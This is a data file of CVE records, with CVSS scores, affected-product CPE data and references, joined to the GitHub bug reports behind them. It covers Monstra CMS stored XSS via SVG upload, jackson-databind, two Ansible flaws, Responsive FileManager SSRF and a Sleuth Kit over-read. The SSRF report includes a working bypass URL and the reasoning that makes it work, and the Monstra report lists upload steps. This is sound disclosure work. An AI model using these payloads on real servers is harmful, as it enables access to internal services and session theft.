[ { "source": "cve@mitre.org", "tags": null, "url": "https://anh.im/image/lG1" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/monstra-cms/monstra/issues/467" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/security-provensec/CVE-2018-19599/blob/master/monstra-dev_svg.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://anh.im/image/lG1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/monstra-cms/monstra/issues/467" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/security-provensec/CVE-2018-19599/blob/master/monstra-dev_svg.pdf" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra_cms:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "316EFE6D-54F6-4928-B2D3-C803D7A4FD7C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/monstra-cms/monstra/issues/467
null
github.com
[ "monstra-cms", "monstra" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Files" feature. Monstra application allows the upload of a SVG file extension (which is also an image type). ** Reproduce** Steps to reproduce the behavior: 1. Login into the panel Monstra 2. Go to "/admin/index.php?id=filesmanager&path=uploads/" 3. Upload file abc.svg: ![2](https://user-images.githubusercontent.com/29293812/82776943-c7954700-9e76-11ea-80f5-6936c577e057.PNG) 4. Open file upload : "/public/uploads/abc.svg" 5. View the preview to trigger XSS. 6. View the preview to get in request and such Stored XSS. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![1](https://user-images.githubusercontent.com/29293812/82776716-11316200-9e76-11ea-875c-9104573adf7f.PNG) **Desktop (please complete the following information):** - OS: Kali - Browser: Firefox - Version of Browser: 68.6
Cross Site Scripting Vulnerability on "Files" upload file SVG in Monstra 3.0.4
https://api.github.com/repos/monstra-cms/monstra/issues/467/comments
0
2020-05-25T03:57:37Z
2020-05-25T03:59:29Z
https://github.com/monstra-cms/monstra/issues/467
624,029,113
467
1,101
CVE-2019-14893
2020-03-02T21:15:17.520
A flaw was discovered in FasterXML jackson-databind in all versions before 2.9.10 and 2.10.0, where it would permit polymorphic deserialization of malicious objects using the xalan JNDI gadget when used in conjunction with polymorphic type handling methods such as `enableDefaultTyping()` or when @JsonTypeInfo is using `Id.CLASS` or `Id.MINIMAL_CLASS` or in any other way which ObjectMapper.readValue might instantiate objects from unsafe sources. An attacker could use this flaw to execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "secalert@redhat.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14893" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2469" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200327-0006/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14893" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2469" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200327-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF323F3D-B2A4-41E7-94F9-5539C9B7025E", "versionEndExcluding": "2.8.11.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE5543DD-3F9D-45EF-8034-E1EF9657955A", "versionEndExcluding": "2.9.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", "matchCriteriaId": "5EC98B22-FFAA-4B59-8E63-EBAA4336AD13", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "F4E7F2AA-B851-4D85-9895-2CDD6BE9FCB4", "versionEndExcluding": "19.1.0.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2469
[ "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget (*) type report regarding a class of `xalan`. Mitre id: not yet allocated Reporter: @ybhou1993 (via #2462 originally) * 2.9.10 * 2.8.11.5 * does not affect 2.10.0 and later ----- (*) See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for more on general problem type
Block one more gadget type (xalan2)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2469/comments
1
2019-09-20T06:20:34Z
2020-02-10T22:13:16Z
https://github.com/FasterXML/jackson-databind/issues/2469
496,168,396
2,469
1,102
CVE-2020-1734
2020-03-03T22:15:10.843
A flaw was found in the pipe lookup plugin of ansible. Arbitrary commands can be run, when the pipe lookup plugin uses subprocess.Popen() with shell=True, by overwriting ansible facts and the variable is not escaped by quote plugin. An attacker could take advantage and run arbitrary commands by overwriting the ansible facts.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.7, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 1.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 6, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1734" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67792" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1734" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/67792" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible_engine:*:*:*:*:*:*:*:*", "matchCriteriaId": "2E713A0F-6AD3-409E-87AA-DE7EB5B7525C", "versionEndExcluding": null, "versionEndIncluding": "2.7.16", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_engine:2.8.8:*:*:*:*:*:*:*", "matchCriteriaId": "CDC2F2BC-209D-4FA4-B1E1-E486DE8AC48B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_engine:2.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "8599992B-8847-4332-80CC-F98FA4125272", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:*:*:*:*:*:*:*:*", "matchCriteriaId": "C3C5721F-050A-42A3-A71D-6C6BA23D58FE", "versionEndExcluding": null, "versionEndIncluding": "3.3.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:3.4.5:*:*:*:*:*:*:*", "matchCriteriaId": "16776B7F-83E9-4918-94D8-60CA0F96F870", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:3.5.5:*:*:*:*:*:*:*", "matchCriteriaId": "8FE9389E-3129-4A14-96CA-5113BD09AD10", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ansible_tower:3.6.3:*:*:*:*:*:*:*", "matchCriteriaId": "E695D048-7109-4840-8DE1-59AC1690E667", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/ansible/ansible/issues/67792
[ "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
##### SUMMARY <!--- Explain the problem briefly below --> CVE-2020-1734 The `pipe` lookup plugin should use `shell=False` be default to avoid potential privilege escalation. A new option should provide a way to enable `shell=True`. If a variable is passed to the `pipe` lookup, that variable could be overriden via facts, leading to arbitrary code execution. **Relevant code:** https://github.com/ansible/ansible/blob/79dfae9624480f757795224732bfaa9ca1dd4543/lib/ansible/plugins/lookup/pipe.py#L61-L61 It seems like this change was made intentionally quite a while ago (https://github.com/ansible/ansible/issues/6550). Changing the default will probably break a lot of things for people. 😞 ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME <!--- Write the short name of the module, plugin, task or feature below, use your best guess if unsure --> `lib/ansible/plugins/lookup/pipe.py` ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below 2.10 ``` ##### CONFIGURATION <!--- Paste verbatim output from "ansible-config dump --only-changed" between quotes --> ```paste below default ``` ##### OS / ENVIRONMENT <!--- Provide all relevant information below, e.g. target OS versions, network device firmware, etc. --> ##### STEPS TO REPRODUCE <!--- Describe exactly how to reproduce the problem, using a minimal test-case --> <!--- Paste example playbooks or commands between quotes below --> ```yaml ``` <!--- HINT: You can paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- Describe what you expected to happen when running the steps above --> ##### ACTUAL RESULTS <!--- Describe what actually happened. If possible run with extra verbosity (-vvvv) --> <!--- Paste verbatim command output between quotes --> ```paste below ```
pipe lookup plugin enables shell by default
https://api.github.com/repos/ansible/ansible/issues/67792/comments
4
2020-02-26T19:48:32Z
2020-05-14T13:00:07Z
https://github.com/ansible/ansible/issues/67792
571,616,203
67,792
1,103
CVE-2020-10212
2020-03-07T00:15:13.117
upload.php in Responsive FileManager 9.13.4 and 9.14.0 allows SSRF via the url parameter because file-extension blocking is mishandled and because it is possible for a DNS hostname to resolve to an internal IP address. For example, an SSRF attempt may succeed if a .ico filename is added to the PATH_INFO. Also, an attacker could create a DNS hostname that resolves to the 0.0.0.0 IP address for DNS pinning. NOTE: this issue exists because of an incomplete fix for CVE-2018-14728.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/trippo/ResponsiveFilemanager/issues/598" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/trippo/ResponsiveFilemanager/issues/598" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tecrail:responsive_filemanager:9.13.4:*:*:*:*:*:*:*", "matchCriteriaId": "6E5817FB-89FD-4B34-A47F-F42E3B5756A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:tecrail:responsive_filemanager:9.14.0:*:*:*:*:*:*:*", "matchCriteriaId": "07160113-5BCB-4E2F-9B56-B4DAABAA9933", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/trippo/ResponsiveFilemanager/issues/598
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "trippo", "ResponsiveFilemanager" ]
Good afternoon ResponsiveFilemanager, When i was doing a security test for a client of mine i noticed in your newest version of ResponsiveFilemanager 9.13.4 ( in 9.14.0 the url upload is completly broken but it also exist there ) internal server side request forgery by adding to any php "/image.ico". to reproduce this i reccomand to install ResponsiveFilemanager 9.13.4 and not ResponsiveFilemanager 9.14.0 because the url file uploader is completly broken and doesn't work at all even with legit jpeg's, but this version is also vulnerble. you need to have url_upload enabled and run the code on a apache server with default configurations. now send as url > http://0.xip.io/server-status/favicon.ico when you send that go back to the file manager and you will see a ico. download that file and rename favicon.ico to favicon.html. if you now open that you will see the apache status page. as you can see this is a clear indication that CVE-2018-14728 is bypassable. how does this work: there are a few problems here. first you only use a regex to verify if it is a allowed url. and in php files ( and sometimes html files ) it is allowed to extend the url. this means if i would go to index.php/favicon.ico than the apache server would return index.php and not favicon.ico, but it would extend the url. secondly i use dns pinning to bypass your miner filter to check if you send localhost because if you do a nslookup on "0.xip.io" you will get: bl4ckh4ck5@bl4ckh4ck5-laptop:~/$ nslookup 0.xip.io Server: 10.5.0.1 Address: 10.5.0.1#53 Non-authoritative answer: Name: 0.xip.io Address: 0.0.0.0 and 0.0.0.0 is localhost, but this method could also be used to access other ip's in the network. a while back i created a potential patch against SSRF what might help against this problem: https://github.com/hackoclipse/ssrf-patch but i reccomand to make the design client side that the webbrowser downloads the image and than you use a xmlhttprequest to request the normal file upload, because that function isn't vulnerble. i reccomand to fix both problems that url upload works again in 9.14.0 and that you fix this internal server side request forgery. A CVE is already been requested. Dear ragards, bl4ckh4ck5 https://hackoclipse.com
server side request forgery vulnerability in url uploader bypass CVE-2018-14728 by adding /favicon.ico to end of php file.
https://api.github.com/repos/trippo/ResponsiveFilemanager/issues/598/comments
6
2020-03-05T05:14:14Z
2020-09-07T14:01:06Z
https://github.com/trippo/ResponsiveFilemanager/issues/598
575,998,259
598
1,104
CVE-2020-10233
2020-03-09T00:15:10.893
In version 4.8.0 and earlier of The Sleuth Kit (TSK), there is a heap-based buffer over-read in ntfs_dinode_lookup in fs/ntfs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/sleuthkit/sleuthkit/issues/1829" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5EY53OYU7UZLAJWNIVVNR3EX2RNCCFTB/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AQR2QY3IAF2IG6HGBSKGL66VUDOTC3OA/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FFQKIE5U3LS5U7POPGS7YHLUSW2URWGJ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/sleuthkit/sleuthkit/issues/1829" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5EY53OYU7UZLAJWNIVVNR3EX2RNCCFTB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AQR2QY3IAF2IG6HGBSKGL66VUDOTC3OA/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FFQKIE5U3LS5U7POPGS7YHLUSW2URWGJ/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sleuthkit:the_sleuth_kit:*:*:*:*:*:*:*:*", "matchCriteriaId": "82607605-9F72-4A99-9704-09E58BA042E0", "versionEndExcluding": null, "versionEndIncluding": "4.8.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/sleuthkit/sleuthkit/issues/1829
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "sleuthkit", "sleuthkit" ]
Hello sleuthkit team, As part of our fuzzing efforts at Google, we have identified an issue affecting sleuthkit (tested with revision * develop c05a93a7ce7d40ab203216bb035e3567d8ce68ec). To reproduce, we are attaching a Dockerfile which compiles the project with LLVM, taking advantage of the sanitizers that it offers. More information about how to use the attached Dockerfile can be found here: https://docs.docker.com/engine/reference/builder/ Instructions: `unzip artifacts_149443351.zip` `docker build --build-arg SANITIZER=address --tag=autofuzz-sleuthkit-149443351 autofuzz_149443351` `docker run --entrypoint /fuzzing/repro.sh --cap-add=SYS_PTRACE -v $PWD/autofuzz_149443351/autofuzz_149443351:/tmp/poc autofuzz-sleuthkit-149443351 "fls ntfs" /tmp/poc` `docker run --cap-add=SYS_PTRACE -v $PWD/autofuzz_149443351/autofuzz_149443351:/tmp/poc -it autofuzz-sleuthkit-149443351` Alternatively, and depending on the bug, you could use gcc, valgrind or other instrumentation tools to aid in the investigation. The sanitizer error that we encountered is here: ``` fls -- ntfs ================================================================= ==9==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x615000000500 at pc 0x000000577889 bp 0x7ffcd77ac1b0 sp 0x7ffcd77ac1a8 READ of size 1 at 0x615000000500 thread T0 #0 0x577888 in ntfs_dinode_lookup /fuzzing/sleuthkit/tsk/fs/ntfs.c:413:17 #1 0x57c476 in ntfs_inode_lookup /fuzzing/sleuthkit/tsk/fs/ntfs.c:2892:9 #2 0x5328f9 in tsk_fs_file_open_meta /fuzzing/sleuthkit/tsk/fs/fs_file.c:128:9 #3 0x579b7e in ntfs_open /fuzzing/sleuthkit/tsk/fs/ntfs.c:5217:13 #4 0x4fc712 in main /fuzzing/sleuthkit/tools/fstools/fls.cpp:309:23 #5 0x7feacf75f09a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2409a) #6 0x4213c9 in _start (/fuzzing/sleuthkit/tools/fstools/fls+0x4213c9) 0x615000000500 is located 0 bytes to the right of 512-byte region [0x615000000300,0x615000000500) allocated by thread T0 here: #0 0x4c9213 in __interceptor_malloc (/fuzzing/sleuthkit/tools/fstools/fls+0x4c9213) #1 0x5dc37e in tsk_malloc /fuzzing/sleuthkit/tsk/base/mymalloc.c:32:16 #2 0x57c458 in ntfs_inode_lookup /fuzzing/sleuthkit/tsk/fs/ntfs.c:2887:25 #3 0x5328f9 in tsk_fs_file_open_meta /fuzzing/sleuthkit/tsk/fs/fs_file.c:128:9 #4 0x579b7e in ntfs_open /fuzzing/sleuthkit/tsk/fs/ntfs.c:5217:13 #5 0x4fc712 in main /fuzzing/sleuthkit/tools/fstools/fls.cpp:309:23 #6 0x7feacf75f09a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2409a) SUMMARY: AddressSanitizer: heap-buffer-overflow /fuzzing/sleuthkit/tsk/fs/ntfs.c:413:17 in ntfs_dinode_lookup Shadow bytes around the buggy address: 0x0c2a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2a7fff80a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==9==ABORTING ``` We will gladly work with you so you can successfully confirm and reproduce this issue. Do let us know if you have any feedback surrounding the documentation. Once you have reproduced the issue, we'd appreciate to learn your expected timeline for an update to be released. With any fix, please attribute the report to "Google Autofuzz project". We are also pleased to inform you that your project is eligible for inclusion to the OSS-Fuzz project, which can provide additional continuous fuzzing, and encourage you to investigate integration options. Don't hesitate to let us know if you have any questions! Google AutoFuzz Team [artifacts_149443351.zip](https://github.com/sleuthkit/sleuthkit/files/4205160/artifacts_149443351.zip)
Heap-buffer-overflow in ntfs_dinode_lookup
https://api.github.com/repos/sleuthkit/sleuthkit/issues/1829/comments
2
2020-02-14T15:42:50Z
2020-04-01T11:10:27Z
https://github.com/sleuthkit/sleuthkit/issues/1829
565,404,605
1,829
1,105
CVE-2020-1737
2020-03-09T16:15:12.407
A flaw was found in Ansible 2.7.17 and prior, 2.8.9 and prior, and 2.9.6 and prior when using the Extract-Zip function from the win_unzip module as the extracted file(s) are not checked if they belong to the destination folder. An attacker could take advantage of this flaw by crafting an archive anywhere in the file system, using a path traversal. This issue is fixed in 2.10.
